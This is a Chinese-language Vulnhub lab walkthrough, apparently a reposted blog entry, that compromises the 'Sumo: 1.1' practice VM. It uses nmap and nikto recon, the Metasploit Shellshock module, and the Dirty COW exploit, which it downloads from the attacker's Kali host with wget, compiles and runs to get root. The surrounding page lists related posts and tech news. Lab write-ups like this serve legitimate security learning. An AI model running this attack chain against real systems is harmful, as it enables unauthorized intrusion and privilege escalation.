[网络安全学习篇78]：Sumo: 1.1 Vulnhub 实战（脏牛漏洞提权） - 代码天地

[网络安全学习篇78]：Sumo: 1.1 Vulnhub 实战（脏牛漏洞提权）

其他 2020-10-29 10:15:26 阅读次数: 0

往期博文：

[网络安全学习篇69]：渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]：渗透测试实战-DC-2-靶机入侵

[网络安全学习篇71]：渗透测试实战-DC-3-靶机入侵

[网络安全学习篇72]：渗透测试实战-DC-4-靶机入侵

[网络安全学习篇73]：渗透测试实战-DC-5-靶机入侵

[网络安全学习篇74]：渗透测试实战-DC-6-靶机入侵

[网络安全学习篇75]：渗透测试实战-DC-7-靶机入侵

[网络安全学习篇76]：渗透测试实战-DC-8-靶机入侵

[网络安全学习篇77]：渗透测试实战-DC-9-靶机入侵

[网络安全学习篇78]：Sumo: 1.1 Vulnhub 实战（脏牛漏洞提权）（本篇）

下期博文：

[网络安全学习篇79]：Geisha: 1 Vulnhub 实战

目录

网络扫描

arp-scan -l

nmap -A 192.168.1.174 -p-

nikto 扫描网站漏洞

nikto -h http://192.168.1.174

攻击

使用msf 查找此漏洞的攻击模块

use exploit/multi/http/apache_mod_cgi_bash_env_exec

set RHOSTS 192.168.1.174

set TARGETURI /cgi-bin/test

exploit

脏牛-提权

扫描是否存在脏牛漏洞脚本scan-dirtycow.sh

https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh

exp:dirty.c

https://www.exploit-db.com/raw/40839

kali 本地开启http 服务

python -m SimpleHTTPServer

远程访问kali 并下载脚本文件，扫描，发现存在脏牛漏洞

wget http://192.168.1.164:8000/scan-dirtycow.sh

chmod 777 scan-dirtycow.sh

./scan-dirtycow.sh

漏洞利用

远程下载exp,编译

wget http://192.168.1.164:8000/dirty.c

chmod 777 dirty.c

gcc -pthread dirty.c -o dirty -lcrypt

拿到flag

./dirty testpasswd

su firefart

testpasswd

参考博文：

https://cyb3rbl0g.github.io/sumo-vulnhub-walkthrough/

https://www.vulnhub.com/

猜你喜欢

转载自blog.csdn.net/weixin_43252204/article/details/106414590

[网络安全学习篇78]：Sumo: 1.1 Vulnhub 实战（脏牛漏洞提权）

[网络安全学习篇79]：Geisha: 1 Vulnhub 实战

vulnhub渗透系列之zico2（内含zip提权和脏牛提权）

No.12-VulnHub-SickOs: 1.1-Walkthrough渗透学习

No.39-VulnHub-Billy Madison: 1.1-Walkthrough渗透学习

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用（二）

VulnHub靶机-SickOs1.1

Vulnhub靶机：SICKOS_ 1.1

对vulnhub靶机lampiao的getshell到脏牛提权获取flag

红队打靶：SickOS1.1详细打靶思路之shellshock漏洞利用（vulnhub）

vulnhub靶机之west-wild-1.1

Vulnhub靶机SickOs1.1渗透

JS安全漏洞-1.1

红队打靶：SickOS1.1详细打靶思路（vulnhub）

Linux利用脏牛漏洞提权

VulnHub渗透实战--hacknos

vulnhub实战：Red

Vulnhub篇presidential:1

vulnhub靶机之DC6实战（wordpress+nmap提权）

【vulnhub】DC-8渗透实战（SID之exim提权）

vulnhub靶机实战——Matrix：1

vulnhub靶场实战（JANGOW:1.0.1）

Vulnhub实战-prime1

Vulnhub实战-DC9

vulnhub实战：DC-2

vulnhub实战：DRIPPING BLUES 1

【网络安全必备知识】本地提权漏洞分析

【网络安全】本地提权漏洞分析

Vulnhub项目：Lin.Security（Linux提权大合集）

Vulnhub-XXE靶机学习

今日推荐

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

周排行

laravle中orm简单的增删改查

文本分类特征选取之CHI开方检验

Spark核心编程-WordCount

大数据开发实战系列之电信客服(1)

读书笔记 - 把时间当作朋友 by 李笑来

python 笔记--if else

SpringBoot/Mybatis/Druid, 多数据源MultiDataSource配置思路

排序三个整数

redis集群搭建【2】-Windows中Redis集群搭建

STM32F030驱动TM1650点亮4联数码管

每日归档

更多

2024-05-16(6)

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)